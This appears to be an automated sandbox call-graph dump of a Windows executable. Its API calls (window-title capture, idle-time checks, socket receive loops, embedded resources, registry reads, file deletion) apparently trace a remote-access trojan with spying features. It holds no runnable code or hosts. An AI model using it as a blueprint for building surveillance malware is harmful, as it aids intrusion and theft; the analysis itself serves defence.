53676->53677 53678 41b61f 53677->53678 53679 401fd8 11 API calls 53678->53679 53680 41b628 53679->53680 53681 401fd8 11 API calls 53680->53681 53681->53659 53682->53571 53683->53561 53684->53591 53685->53605 53686->53603 53687->53574 53690 4032aa 53689->53690 53691 4028e8 28 API calls 53690->53691 53692 4032c9 53690->53692 53691->53692 53692->53651 53694 4024f9 53693->53694 53695 40250a 28 API calls 53694->53695 53696 4020b1 53695->53696 53696->53658 53703 4051ef 53697->53703 53699 406391 53707 402055 53699->53707 53702->53674 53704 4051fb 53703->53704 53713 405274 53704->53713 53706 405208 53706->53699 53708 402061 53707->53708 53709 4023ce 11 API calls 53708->53709 53710 40207b 53709->53710 53735 40267a 53710->53735 53714 405282 53713->53714 53715 405288 53714->53715 53716 40529e 53714->53716 53724 4025f0 53715->53724 53718 4052f5 53716->53718 53719 4052b6 53716->53719 53733 4028a4 22 API calls 53718->53733 53722 4028e8 28 API calls 53719->53722 53723 40529c 53719->53723 53722->53723 53723->53706 53725 402888 22 API calls 53724->53725 53726 402602 53725->53726 53727 402672 53726->53727 53728 402629 53726->53728 53734 4028a4 22 API calls 53727->53734 53730 4028e8 28 API calls 53728->53730 53732 40263b 53728->53732 53730->53732 53732->53723 53736 40268b 53735->53736 53737 4023ce 11 API calls 53736->53737 53738 40208d 53737->53738 53738->53669 53740 4025f0 28 API calls 53739->53740 53741 401fbd 53740->53741 53741->53625 53743 404ba0 WaitForSingleObject 53742->53743 53744 404bcd recv 53742->53744 53782 421107 54 API calls 53743->53782 53746 404be0 53744->53746 53746->53641 53747 404bbc SetEvent 53747->53746 53749 401ff1 53748->53749 53750 402039 53748->53750 53751 4023ce 11 API calls 53749->53751 53750->53641 53752 401ffa 53751->53752 53753 40203c 53752->53753 53754 402015 53752->53754 53755 40267a 11 API calls 53753->53755 53783 403098 28 API calls 53754->53783 53755->53750 53758 4020df 11 API calls 53757->53758 53768 404cde 53758->53768 53759 404e13 53760 401fd8 11 API calls 53759->53760 53761 404e1c 53760->53761 53761->53641 53762 4041a2 28 API calls 53762->53768 53763 401fe2 28 API calls 53763->53768 53764 401fd8 11 API calls 53764->53768 53766 4020f6 28 API calls 53766->53768 53768->53759 53768->53762 53768->53763 53768->53764 53768->53766 53784 401fc0 53768->53784 53770 404e40 SetEvent CloseHandle 53769->53770 53771 404e57 closesocket 53769->53771 53772 404ca8 53770->53772 53773 404e64 53771->53773 53772->53640 53774 404e7a 53773->53774 54083 4050e4 84 API calls 53773->54083 53776 404e8c WaitForSingleObject 53774->53776 53777 404ece SetEvent CloseHandle 53774->53777 54084 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53776->54084 53777->53772 53779 404e9b SetEvent WaitForSingleObject 54085 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53779->54085 53781 404eb3 SetEvent CloseHandle CloseHandle 53781->53777 53782->53747 53783->53750 53785 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53784->53785 53786 401fc9 53784->53786 53785->53768 53789 415b25 53785->53789 53788 4025e0 28 API calls 53786->53788 53788->53785 53790 4020f6 28 API calls 53789->53790 53791 415b47 SetEvent 53790->53791 53792 415b5c 53791->53792 53868 4041a2 53792->53868 53795 4020f6 28 API calls 53796 415b86 53795->53796 53797 4020f6 28 API calls 53796->53797 53798 415b98 53797->53798 53871 41beac 53798->53871 53801 415bc1 GetTickCount 53893 41bc1f 53801->53893 53802 415d20 53865 415d11 53802->53865 53866 415d34 53802->53866 53803 401e8d 11 API calls 53805 4170cd 53803->53805 53808 401fd8 11 API calls 53805->53808 53810 4170d9 53808->53810 53812 401fd8 11 API calls 53810->53812 53811 415bde 53814 41bc1f 28 API calls 53811->53814 53813 4170e5 53812->53813 53815 415be9 53814->53815 53899 41bb27 53815->53899 53820 401e65 22 API calls 53821 415c13 53820->53821 53822 402f31 28 API calls 53821->53822 53823 415c21 53822->53823 53908 402ea1 28 API calls 53823->53908 53825 415c30 53826 402f10 28 API calls 53825->53826 53827 415c3f 53826->53827 53909 402ea1 28 API calls 53827->53909 53829 415c4e 53830 402f10 28 API calls 53829->53830 53831 415c5a 53830->53831 53910 402ea1 28 API calls 53831->53910 53833 415c64 53834 404aa1 61 API calls 53833->53834 53835 415c73 53834->53835 53836 401fd8 11 API calls 53835->53836 53837 415c7c 53836->53837 53838 401fd8 11 API calls 53837->53838 53839 415c88 53838->53839 53840 401fd8 11 API calls 53839->53840 53841 415c94 53840->53841 53842 401fd8 11 API calls 53841->53842 53843 415ca0 53842->53843 53844 401fd8 11 API calls 53843->53844 53845 415cac 53844->53845 53846 401fd8 11 API calls 53845->53846 53847 415cb8 53846->53847 53911 401f09 53847->53911 53850 401fd8 11 API calls 53851 415cca 53850->53851 53852 401fd8 11 API calls 53851->53852 53853 415cd3 53852->53853 53854 401e65 22 API calls 53853->53854 53855 415cde 53854->53855 53914 43bb2c 53855->53914 53858 415cf0 53861 415d09 53858->53861 53862 415cfe 53858->53862 53859 415d16 53860 401e65 22 API calls 53859->53860 53860->53802 53919 404f51 53861->53919 53918 404ff4 82 API calls 53862->53918 53865->53803 53934 4050e4 84 API calls 53866->53934 53867 415d04 53867->53865 53935 40423a 53868->53935 53872 4020df 11 API calls 53871->53872 53873 41bebf 53872->53873 53877 41bf31 53873->53877 53880 4041a2 28 API calls 53873->53880 53885 401fe2 28 API calls 53873->53885 53887 401fd8 11 API calls 53873->53887 53892 41bf2f 53873->53892 53941 41cec5 28 API calls 53873->53941 53874 401fd8 11 API calls 53875 41bf61 53874->53875 53876 401fd8 11 API calls 53875->53876 53878 41bf69 53876->53878 53879 4041a2 28 API calls 53877->53879 53881 401fd8 11 API calls 53878->53881 53882 41bf3d 53879->53882 53880->53873 53883 415ba1 53881->53883 53884 401fe2 28 API calls 53882->53884 53883->53801 53883->53802 53883->53865 53886 41bf46 53884->53886 53885->53873 53888 401fd8 11 API calls 53886->53888 53887->53873 53889 41bf4e 53888->53889 53942 41cec5 28 API calls 53889->53942 53892->53874 53943 441ed1 53893->53943 53896 402093 28 API calls 53897 415bd2 53896->53897 53898 41bb77 GetLastInputInfo GetTickCount 53897->53898 53898->53811 53952 436f10 53899->53952 53904 41bdaf 53905 41bdbc 53904->53905 53906 4020b7 28 API calls 53905->53906 53907 415c05 53906->53907 53907->53820 53908->53825 53909->53829 53910->53833 53912 402252 11 API calls 53911->53912 53913 401f12 53912->53913 53913->53850 53915 43bb45 _strftime 53914->53915 54001 43ae83 53915->54001 53917 415ceb 53917->53858 53917->53859 53918->53867 53920 404f65 53919->53920 53921 404fea 53919->53921 53922 404f6e 53920->53922 53923 404fc0 CreateEventA CreateThread 53920->53923 53924 404f7d GetLocalTime 53920->53924 53921->53865 53922->53923 53923->53921 54079 405150 53923->54079 53925 41bc1f 28 API calls 53924->53925 53926 404f91 53925->53926 54078 4052fd 28 API calls 53926->54078 53934->53867 53936 404243 53935->53936 53937 4023ce 11 API calls 53936->53937 53938 40424e 53937->53938 53939 402569 28 API calls 53938->53939 53940 4041b5 53939->53940 53940->53795 53941->53873 53942->53892 53944 441edd 53943->53944 53947 441ccd 53944->53947 53946 41bc43 53946->53896 53948 441ce4 53947->53948 53950 441d1b __cftoe 53948->53950 53951 44062d 20 API calls __dosmaperr 53948->53951 53950->53946 53951->53950 53953 41bb46 GetForegroundWindow GetWindowTextW 53952->53953 53954 40417e 53953->53954 53955 404186 53954->53955 53960 402252 53955->53960 53957 404191 53964 4041bc 53957->53964 53961 40225c 53960->53961 53962 4022ac 53960->53962 53961->53962 53968 402779 11 API calls std::_Deallocate 53961->53968 53962->53957 53965 4041c8 53964->53965 53969 4041d9 53965->53969 53967 40419c 53967->53904 53968->53962 53970 4041e9 53969->53970 53971 404206 53970->53971 53972 4041ef 53970->53972 53986 4027e6 53971->53986 53976 404267 53972->53976 53975 404204 53975->53967 53977 402888 22 API calls 53976->53977 53978 40427b 53977->53978 53979 404290 53978->53979 53980 4042a5 53978->53980 53997 4042df 22 API calls 53979->53997 53981 4027e6 28 API calls 53980->53981 53985 4042a3 53981->53985 53983 404299 53998 402c48 22 API calls 53983->53998 53985->53975 53987 4027ef 53986->53987 53988 402851 53987->53988 53989 4027f9 53987->53989 54000 4028a4 22 API calls 53988->54000 53992 402802 53989->53992 53993 402815 53989->53993 53999 402aea 28 API calls __EH_prolog 53992->53999 53995 402813 53993->53995 53996 402252 11 API calls 53993->53996 53995->53975 53996->53995 53997->53983 53998->53985 53999->53995 54017 43ba8a 54001->54017 54003 43aed0 54023 43a837 54003->54023 54004 43ae95 54004->54003 54005 43aeaa 54004->54005 54016 43aeaf __cftoe 54004->54016 54022 44062d 20 API calls __dosmaperr 54005->54022 54009 43aedc 54010 43af0b 54009->54010 54031 43bacf 40 API calls __Tolower 54009->54031 54013 43af77 54010->54013 54032 43ba36 20 API calls 2 library calls 54010->54032 54033 43ba36 20 API calls 2 library calls 54013->54033 54014 43b03e _strftime 54014->54016 54034 44062d 20 API calls __dosmaperr 54014->54034 54016->53917 54018 43baa2 54017->54018 54019 43ba8f 54017->54019 54018->54004 54035 44062d 20 API calls __dosmaperr 54019->54035 54021 43ba94 __cftoe 54021->54004 54022->54016 54024 43a854 54023->54024 54025 43a84a 54023->54025 54024->54025 54036 448295 GetLastError 54024->54036 54025->54009 54027 43a875 54056 4483e4 36 API calls __Tolower 54027->54056 54029 43a88e 54057 448411 36 API calls __cftoe 54029->54057 54031->54009 54032->54013 54033->54014 54034->54016 54035->54021 54037 4482b1 54036->54037 54038 4482ab 54036->54038 54042 448300 SetLastError 54037->54042 54059 445b74 54037->54059 54058 44883c 11 API calls 2 library calls 54038->54058 54042->54027 54043 4482cb 54066 446802 54043->54066 54045 4482e0 54045->54043 54048 4482e7 54045->54048 54047 4482d1 54049 44830c SetLastError 54047->54049 54073 448107 20 API calls pre_c_initialization 54048->54073 54074 446175 36 API calls 4 library calls 54049->54074 54051 4482f2 54053 446802 _free 20 API calls 54051->54053 54055 4482f9 54053->54055 54054 448318 54055->54042 54055->54049 54056->54029 54057->54025 54058->54037 54064 445b81 __Getctype 54059->54064 54060 445bc1 54076 44062d 20 API calls __dosmaperr 54060->54076 54061 445bac RtlAllocateHeap 54062 445bbf 54061->54062 54061->54064 54062->54043 54072 448892 11 API calls 2 library calls 54062->54072 54064->54060 54064->54061 54075 443001 7 API calls 2 library calls 54064->54075 54067 44680d HeapFree 54066->54067 54068 446836 _free 54066->54068 54067->54068 54069 446822 54067->54069 54068->54047 54077 44062d 20 API calls __dosmaperr 54069->54077 54071 446828 GetLastError 54071->54068 54072->54045 54073->54051 54074->54054 54075->54064 54076->54062 54077->54071 54082 40515c 102 API calls 54079->54082 54081 405159 54082->54081 54083->53774 54084->53779 54085->53781 54086 44839e 54094 448790 54086->54094 54089 4483b2 54092 4483c7 54121 44854a 54094->54121 54097 4487cf TlsAlloc 54098 4487c0 54097->54098 54128 43502b 54098->54128 54100 4483a8 54100->54089 54101 448319 GetLastError 54100->54101 54102 448332 54101->54102 54103 448338 54101->54103 54143 44883c 11 API calls 2 library calls 54102->54143 54105 445b74 __Getctype 17 API calls 54103->54105 54107 44838f SetLastError 54103->54107 54106 44834a 54105->54106 54110 448352 54106->54110 54144 448892 11 API calls 2 library calls 54106->54144 54109 448398 54107->54109 54109->54092 54120 4483ca 11 API calls 54109->54120 54112 446802 _free 17 API calls 54110->54112 54111 448367 54111->54110 54114 44836e 54111->54114 54113 448358 54112->54113 54115 448386 SetLastError 54113->54115 54145 448107 20 API calls pre_c_initialization 54114->54145 54115->54109 54117 448379 54118 446802 _free 17 API calls 54117->54118 54119 44837f 54118->54119 54119->54107 54119->54115 54120->54089 54122 448576 54121->54122 54123 44857a 54121->54123 54122->54123 54125 44859a 54122->54125 54135 4485e6 54122->54135 54123->54097 54123->54098 54125->54123 54126 4485a6 GetProcAddress 54125->54126 54127 4485b6 __crt_fast_encode_pointer 54126->54127 54127->54123 54129 435036 IsProcessorFeaturePresent 54128->54129 54130 435034 54128->54130 54132 435078 54129->54132 54130->54100 54142 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54132->54142 54134 43515b 54134->54100 54136 448607 LoadLibraryExW 54135->54136 54141 4485fc 54135->54141 54137 448624 GetLastError 54136->54137 54138 44863c 54136->54138 54137->54138 54139 44862f LoadLibraryExW 54137->54139 54140 448653 FreeLibrary 54138->54140 54138->54141 54139->54138 54140->54141 54141->54122 54142->54134 54143->54103 54144->54111 54145->54117 54146 100020db 54149 100020e7 ___DestructExceptionObject 54146->54149 54147 100020f6 54148 10002110 dllmain_raw 54148->54147 54150 1000212a 54148->54150 54149->54147 54149->54148 54152 1000210b 54149->54152 54159 10001eec 54150->54159 54152->54147 54153 10002177 54152->54153 54156 10001eec 31 API calls 54152->54156 54153->54147 54154 10001eec 31 API calls 54153->54154 54155 1000218a 54154->54155 54155->54147 54157 10002193 dllmain_raw 54155->54157 54158 1000216d dllmain_raw 54156->54158 54157->54147 54158->54153 54160 10001ef7 54159->54160 54161 10001f2a dllmain_crt_process_detach 54159->54161 54162 10001f1c dllmain_crt_process_attach 54160->54162 54163 10001efc 54160->54163 54168 10001f06 54161->54168 54162->54168 54164 10001f01 54163->54164 54165 10001f12 54163->54165 54164->54168 54169 1000240b 27 API calls 54164->54169 54170 100023ec 29 API calls 54165->54170 54168->54152 54169->54168 54170->54168 54171 434918 54172 434924 ___scrt_is_nonwritable_in_current_image 54171->54172 54198 434627 54172->54198 54174 43492b 54176 434954 54174->54176 54504 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54174->54504 54185 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54176->54185 54209 4442d2 54176->54209 54180 434973 ___scrt_is_nonwritable_in_current_image 54181 4349f3 54217 434ba5 54181->54217 54185->54181 54505 443487 36 API calls 5 library calls 54185->54505 54199 434630 54198->54199 54510 434cb6 IsProcessorFeaturePresent 54199->54510 54201 43463c 54511 438fb1 54201->54511 54203 434641 54204 434645 54203->54204 54520 44415f 54203->54520 54204->54174 54207 43465c 54207->54174 54211 4442e9 54209->54211 54210 43502b _ValidateLocalCookies 5 API calls 54212 43496d 54210->54212 54211->54210 54212->54180 54213 444276 54212->54213 54214 4442a5 54213->54214 54215 43502b _ValidateLocalCookies 5 API calls 54214->54215 54216 4442ce 54215->54216 54216->54185 54218 436f10 ___scrt_fastfail 54217->54218 54219 434bb8 GetStartupInfoW 54218->54219 54220 4349f9 54219->54220 54221 444223 54220->54221 54570 44f0d9 54221->54570 54223 44422c 54225 434a02 54223->54225 54574 446895 36 API calls 54223->54574 54226 40ea00 54225->54226 54704 41cbe1 LoadLibraryA GetProcAddress 54226->54704 54228 40ea1c GetModuleFileNameW 54709 40f3fe 54228->54709 54230 40ea38 54231 4020f6 28 API calls 54230->54231 54232 40ea47 54231->54232 54233 4020f6 28 API calls 54232->54233 54234 40ea56 54233->54234 54235 41beac 28 API calls 54234->54235 54236 40ea5f 54235->54236 54724 40fb52 54236->54724 54238 40ea68 54239 401e8d 11 API calls 54238->54239 54240 40ea71 54239->54240 54241 40ea84 54240->54241 54242 40eace 54240->54242 54918 40fbee 118 API calls 54241->54918 54244 401e65 22 API calls 54242->54244 54246 40eade 54244->54246 54245 40ea96 54247 401e65 22 API calls 54245->54247 54249 401e65 22 API calls 54246->54249 54248 40eaa2 54247->54248 54919 410f72 36 API calls __EH_prolog 54248->54919 54250 40eafd 54249->54250 54251 40531e 28 API calls 54250->54251 54253 40eb0c 54251->54253 54255 406383 28 API calls 54253->54255 54254 40eab4 54920 40fb9f 78 API calls 54254->54920 54257 40eb18 54255->54257 54259 401fe2 28 API calls 54257->54259 54258 40eabd 54921 40f3eb 71 API calls 54258->54921 54261 40eb24 54259->54261 54262 401fd8 11 API calls 54261->54262 54263 40eb2d 54262->54263 54265 401fd8 11 API calls 54263->54265 54267 40eb36 54265->54267 54268 401e65 22 API calls 54267->54268 54269 40eb3f 54268->54269 54270 401fc0 28 API calls 54269->54270 54271 40eb4a 54270->54271 54272 401e65 22 API calls 54271->54272 54273 40eb63 54272->54273 54274 401e65 22 API calls 54273->54274 54275 40eb7e 54274->54275 54276 40ebe9 54275->54276 54922 406c59 54275->54922 54277 401e65 22 API calls 54276->54277 54283 40ebf6 54277->54283 54279 40ebab 54280 401fe2 28 API calls 54279->54280 54281 40ebb7 54280->54281 54282 401fd8 11 API calls 54281->54282 54285 40ebc0 54282->54285 54284 40ec3d 54283->54284 54289 413584 3 API calls 54283->54289 54728 40d0a4 54284->54728 54927 413584 RegOpenKeyExA 54285->54927 54295 40ec21 54289->54295 54293 40f38a 55020 4139e4 30 API calls 54293->55020 54295->54284 54930 4139e4 30 API calls 54295->54930 54303 40f3a0 55021 4124b0 65 API calls ___scrt_fastfail 54303->55021 54504->54174 54505->54181 54510->54201 54512 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54511->54512 54524 43a4ba 54512->54524 54515 438fc4 54515->54203 54517 438fcc 54518 438fd7 54517->54518 54538 43a4f6 DeleteCriticalSection 54517->54538 54518->54203 54566 44fbe8 54520->54566 54523 438fda 8 API calls 3 library calls 54523->54204 54525 43a4c3 54524->54525 54527 43a4ec 54525->54527 54529 438fc0 54525->54529 54539 438eff 54525->54539 54544 43a4f6 DeleteCriticalSection 54527->54544 54529->54515 54530 43a46c 54529->54530 54559 438e14 54530->54559 54532 43a476 54533 43a481 54532->54533 54564 438ec2 6 API calls try_get_function 54532->54564 54533->54517 54535 43a48f 54536 43a49c 54535->54536 54565 43a49f 6 API calls ___vcrt_FlsFree 54535->54565 54536->54517 54538->54515 54545 438cf3 54539->54545 54542 438f36 InitializeCriticalSectionAndSpinCount 54543 438f22 54542->54543 54543->54525 54544->54529 54546 438d23 54545->54546 54547 438d27 54545->54547 54546->54547 54550 438d47 54546->54550 54552 438d93 54546->54552 54547->54542 54547->54543 54549 438d53 GetProcAddress 54551 438d63 __crt_fast_encode_pointer 54549->54551 54550->54547 54550->54549 54551->54547 54553 438dbb LoadLibraryExW 54552->54553 54558 438db0 54552->54558 54554 438dd7 GetLastError 54553->54554 54555 438def 54553->54555 54554->54555 54556 438de2 LoadLibraryExW 54554->54556 54557 438e06 FreeLibrary 54555->54557 54555->54558 54556->54555 54557->54558 54558->54546 54560 438cf3 try_get_function 5 API calls 54559->54560 54561 438e2e 54560->54561 54562 438e46 TlsAlloc 54561->54562 54563 438e37 54561->54563 54563->54532 54564->54535 54565->54533 54567 44fc01 54566->54567 54568 43502b _ValidateLocalCookies 5 API calls 54567->54568 54569 43464e 54568->54569 54569->54207 54569->54523 54571 44f0eb 54570->54571 54572 44f0e2 54570->54572 54571->54223 54575 44efd8 54572->54575 54574->54223 54576 448295 pre_c_initialization 36 API calls 54575->54576 54577 44efe5 54576->54577 54595 44f0f7 54577->54595 54579 44efed 54604 44ed6c 54579->54604 54582 44f004 54582->54571 54585 44f047 54588 446802 _free 20 API calls 54585->54588 54588->54582 54589 44f042 54628 44062d 20 API calls __dosmaperr 54589->54628 54591 44f08b 54591->54585 54629 44ec42 20 API calls 54591->54629 54592 44f05f 54592->54591 54593 446802 _free 20 API calls 54592->54593 54593->54591 54596 44f103 ___scrt_is_nonwritable_in_current_image 54595->54596 54597 448295 pre_c_initialization 36 API calls 54596->54597 54598 44f10d 54597->54598 54600 44f191 ___scrt_is_nonwritable_in_current_image 54598->54600 54603 446802 _free 20 API calls 54598->54603 54630 446175 36 API calls 4 library calls 54598->54630 54631 445909 EnterCriticalSection 54598->54631 54632 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54598->54632 54600->54579 54603->54598 54605 43a837 __cftoe 36 API calls 54604->54605 54606 44ed7e 54605->54606 54607 44ed8d GetOEMCP 54606->54607 54608 44ed9f 54606->54608 54609 44edb6 54607->54609 54608->54609 54610 44eda4 GetACP 54608->54610 54609->54582 54611 4461b8 54609->54611 54610->54609 54612 4461f6 54611->54612 54613 4461c6 __Getctype 54611->54613 54634 44062d 20 API calls __dosmaperr 54612->54634 54613->54612 54614 4461e1 RtlAllocateHeap 54613->54614 54633 443001 7 API calls 2 library calls 54613->54633 54614->54613 54616 4461f4 54614->54616 54616->54585 54618 44f199 54616->54618 54619 44ed6c 38 API calls 54618->54619 54621 44f1b8 54619->54621 54620 44f1bf 54622 43502b _ValidateLocalCookies 5 API calls 54620->54622 54621->54620 54624 44f209 IsValidCodePage 54621->54624 54627 44f22e ___scrt_fastfail 54621->54627 54623 44f03a 54622->54623 54623->54589 54623->54592 54624->54620 54625 44f21b GetCPInfo 54624->54625 54625->54620 54625->54627 54635 44ee44 GetCPInfo 54627->54635 54628->54585 54629->54585 54630->54598 54631->54598 54632->54598 54633->54613 54634->54616 54636 44ef28 54635->54636 54637 44ee7e 54635->54637 54639 43502b _ValidateLocalCookies 5 API calls 54636->54639 54645 4511ac 54637->54645 54641 44efd4 54639->54641 54641->54620 54644 44aee6 _swprintf 41 API calls 54644->54636 54646 43a837 __cftoe 36 API calls 54645->54646 54647 4511cc MultiByteToWideChar 54646->54647 54649 45120a 54647->54649 54655 4512a2 54647->54655 54651 4461b8 ___crtLCMapStringA 21 API calls 54649->54651 54656 45122b __alloca_probe_16 ___scrt_fastfail 54649->54656 54650 43502b _ValidateLocalCookies 5 API calls 54652 44eedf 54650->54652 54651->54656 54659 44aee6 54652->54659 54653 45129c 54664 435ecd 20 API calls _free 54653->54664 54655->54650 54656->54653 54657 451270 MultiByteToWideChar 54656->54657 54657->54653 54658 45128c GetStringTypeW 54657->54658 54658->54653 54660 43a837 __cftoe 36 API calls 54659->54660 54661 44aef9 54660->54661 54665 44acc9 54661->54665 54664->54655 54666 44ace4 ___crtLCMapStringA 54665->54666 54667 44ad0a MultiByteToWideChar 54666->54667 54668 44ad34 54667->54668 54669 44aebe 54667->54669 54673 4461b8 ___crtLCMapStringA 21 API calls 54668->54673 54675 44ad55 __alloca_probe_16 54668->54675 54670 43502b _ValidateLocalCookies 5 API calls 54669->54670 54671 44aed1 54670->54671 54671->54644 54672 44ad9e MultiByteToWideChar 54674 44adb7 54672->54674 54687 44ae0a 54672->54687 54673->54675 54692 448c33 54674->54692 54675->54672 54675->54687 54679 44ade1 54683 448c33 _strftime 11 API calls 54679->54683 54679->54687 54680 44ae19 54681 44ae3a __alloca_probe_16 54680->54681 54682 4461b8 ___crtLCMapStringA 21 API calls 54680->54682 54684 44aeaf 54681->54684 54685 448c33 _strftime 11 API calls 54681->54685 54682->54681 54683->54687 54700 435ecd 20 API calls _free 54684->54700 54688 44ae8e 54685->54688 54701 435ecd 20 API calls _free 54687->54701 54688->54684 54689 44ae9d WideCharToMultiByte 54688->54689 54689->54684 54690 44aedd 54689->54690 54702 435ecd 20 API calls _free 54690->54702 54693 44854a pre_c_initialization 5 API calls 54692->54693 54694 448c5a 54693->54694 54697 448c63 54694->54697 54703 448cbb 10 API calls 3 library calls 54694->54703 54696 448ca3 LCMapStringW 54696->54697 54698 43502b _ValidateLocalCookies 5 API calls 54697->54698 54699 448cb5 54698->54699 54699->54679 54699->54680 54699->54687 54700->54687 54701->54669 54702->54687 54703->54696 54705 41cc20 LoadLibraryA GetProcAddress 54704->54705 54706 41cc10 GetModuleHandleA GetProcAddress 54704->54706 54707 41cc49 44 API calls 54705->54707 54708 41cc39 LoadLibraryA GetProcAddress 54705->54708 54706->54705 54707->54228 54708->54707 55022 41b539 FindResourceA 54709->55022 54712 43bda0 ___std_exception_copy 21 API calls 54713 40f428 ctype 54712->54713 54714 4020b7 28 API calls 54713->54714 54715 40f443 54714->54715 54716 401fe2 28 API calls 54715->54716 54717 40f44e 54716->54717 54718 401fd8 11 API calls 54717->54718 54719 40f457 54718->54719 54720 43bda0 ___std_exception_copy 21 API calls 54719->54720 54721 40f468 ctype 54720->54721 55025 406e13 54721->55025 54723 40f49b 54723->54230 54725 40fb5e 54724->54725 54727 40fb65 54724->54727 55028 402163 11 API calls 54725->55028 54727->54238 55029 401fab 54728->55029 54918->54245 54919->54254 54920->54258 54923 4020df 11 API calls 54922->54923 54924 406c65 54923->54924 54925 4032a0 28 API calls 54924->54925 54926 406c82 54925->54926 54926->54279 54928 40ebdf 54927->54928 54929 4135ae RegQueryValueExA RegCloseKey 54927->54929 54928->54276 54928->54293 54929->54928 54930->54284 55020->54303 55023 41b556 LoadResource LockResource SizeofResource 55022->55023 55024 40f419 55022->55024 55023->55024 55024->54712 55026 4020b7 28 API calls 55025->55026 55027 406e27 55026->55027 55027->54723 55028->54727 55535 4129da 55536 4129ec 55535->55536 55537 4041a2 28 API calls 55536->55537 55538 4129ff 55537->55538 55539 4020f6 28 API calls 55538->55539 55540 412a0e 55539->55540 55541 4020f6 28 API calls 55540->55541 55542 412a1d 55541->55542 55543 41beac 28 API calls 55542->55543 55544 412a26 55543->55544 55545 412ace 55544->55545 55547 401e65 22 API calls 55544->55547 55546 401e8d 11 API calls 55545->55546 55548 412ad7 55546->55548 55549 412a3d 55547->55549 55550 401fd8 11 API calls 55548->55550 55551 4020f6 28 API calls 55549->55551 55552 412ae0 55550->55552 55553 412a48 55551->55553 55554 401fd8 11 API calls 55552->55554 55555 401e65 22 API calls 55553->55555 55556 412ae8 55554->55556 55557 412a53 55555->55557 55558 4020f6 28 API calls 55557->55558 55559 412a5e 55558->55559 55560 401e65 22 API calls 55559->55560 55561 412a69 55560->55561 55562 4020f6 28 API calls 55561->55562 55563 412a74 55562->55563 55564 401e65 22 API calls 55563->55564 55565 412a7f 55564->55565 55566 4020f6 28 API calls 55565->55566 55567 412a8a 55566->55567 55568 401e65 22 API calls 55567->55568 55569 412a95 55568->55569 55570 4020f6 28 API calls 55569->55570 55571 412aa0 55570->55571 55572 401e65 22 API calls 55571->55572 55573 412aae 55572->55573 55574 4020f6 28 API calls 55573->55574 55575 412ab9 55574->55575 55579 412aef GetModuleFileNameW 55575->55579 55578 404e26 99 API calls 55578->55545 55580 4020df 11 API calls 55579->55580 55581 412b1a 55580->55581 55582 4020df 11 API calls 55581->55582 55583 412b26 55582->55583 55584 4020df 11 API calls 55583->55584 55608 412b32 55584->55608 55585 40da23 32 API calls 55585->55608 55586 401fd8 11 API calls 55586->55608 55587 41ba09 43 API calls 55587->55608 55588 4185a3 31 API calls 55588->55608 55589 412c58 Sleep 55589->55608 55590 40417e 28 API calls 55590->55608 55591 4042fc 84 API calls 55591->55608 55592 40431d 28 API calls 55592->55608 55593 401f09 11 API calls 55593->55608 55594 412cfa Sleep 55594->55608 55595 403014 28 API calls 55595->55608 55596 412d9c Sleep 55596->55608 55597 41c516 32 API calls 55597->55608 55598 412dff DeleteFileW 55598->55608 55599 412e36 DeleteFileW 55599->55608 55600 412df1 55600->55598 55600->55599 55602 412e72 DeleteFileW 55600->55602 55600->55608 55615 401f09 11 API calls 55600->55615 55619 412eff 55600->55619 55601 412e88 Sleep 55601->55608 55602->55608 55603 412f01 55604 401f09 11 API calls 55603->55604 55605 412f0d 55604->55605 55606 401f09 11 API calls 55605->55606 55607 412f19 55606->55607 55609 401f09 11 API calls 55607->55609 55608->55585 55608->55586 55608->55587 55608->55588 55608->55589 55608->55590 55608->55591 55608->55592 55608->55593 55608->55594 55608->55595 55608->55596 55608->55597 55608->55600 55608->55601 55608->55603 55611 412ecd Sleep 55608->55611 55610 412f25 55609->55610 55612 40b93f 28 API calls 55610->55612 55613 401f09 11 API calls 55611->55613 55614 412f38 55612->55614 55613->55600 55616 4020f6 28 API calls 55614->55616 55615->55600 55617 412f58 55616->55617 55726 413268 55617->55726 55619->55610 55621 401f09 11 API calls 55622 412f6f 55621->55622 55623 4130e3 55622->55623 55624 412f8f 55622->55624 55625 41bdaf 28 API calls 55623->55625 55626 41bdaf 28 API calls 55624->55626 55627 4130ec 55625->55627 55628 412f9b 55626->55628 55629 402f31 28 API calls 55627->55629 55630 41bc1f 28 API calls 55628->55630 55631 413123 55629->55631 55632 412fb5 55630->55632 55633 402f10 28 API calls 55631->55633 55634 402f31 28 API calls 55632->55634 55635 413132 55633->55635 55636 412fe5 55634->55636 55637 402f10 28 API calls 55635->55637 55638 402f10 28 API calls 55636->55638 55639 41313e 55637->55639 55640 412ff4 55638->55640 55641 402f10 28 API calls 55639->55641 55642 402f10 28 API calls 55640->55642 55643 41314d 55641->55643 55644 413003 55642->55644 55645 402f10 28 API calls 55643->55645 55646 402f10 28 API calls 55644->55646 55647 41315c 55645->55647 55648 413012 55646->55648 55649 402f10 28 API calls 55647->55649 55650 402f10 28 API calls 55648->55650 55652 41316b 55649->55652 55651 413021 55650->55651 55654 402f10 28 API calls 55651->55654 55653 402f10 28 API calls 55652->55653 55655 41317a 55653->55655 55656 41302d 55654->55656 55740 402ea1 28 API calls 55655->55740 55658 402f10 28 API calls 55656->55658 55660 413039 55658->55660 55659 413184 55661 404aa1 61 API calls 55659->55661 55738 402ea1 28 API calls 55660->55738 55663 413191 55661->55663 55665 401fd8 11 API calls 55663->55665 55664 413048 55666 402f10 28 API calls 55664->55666 55667 41319d 55665->55667 55668 413054 55666->55668 55669 401fd8 11 API calls 55667->55669 55739 402ea1 28 API calls 55668->55739 55671 4131a9 55669->55671 55673 401fd8 11 API calls 55671->55673 55672 41305e 55674 404aa1 61 API calls 55672->55674 55675 4131b5 55673->55675 55676 41306b 55674->55676 55677 401fd8 11 API calls 55675->55677 55678 401fd8 11 API calls 55676->55678 55679 4131c1 55677->55679 55680 413074 55678->55680 55681 401fd8 11 API calls 55679->55681 55682 401fd8 11 API calls 55680->55682 55684 4131ca 55681->55684 55683 41307d 55682->55683 55686 401fd8 11 API calls 55683->55686 55685 401fd8 11 API calls 55684->55685 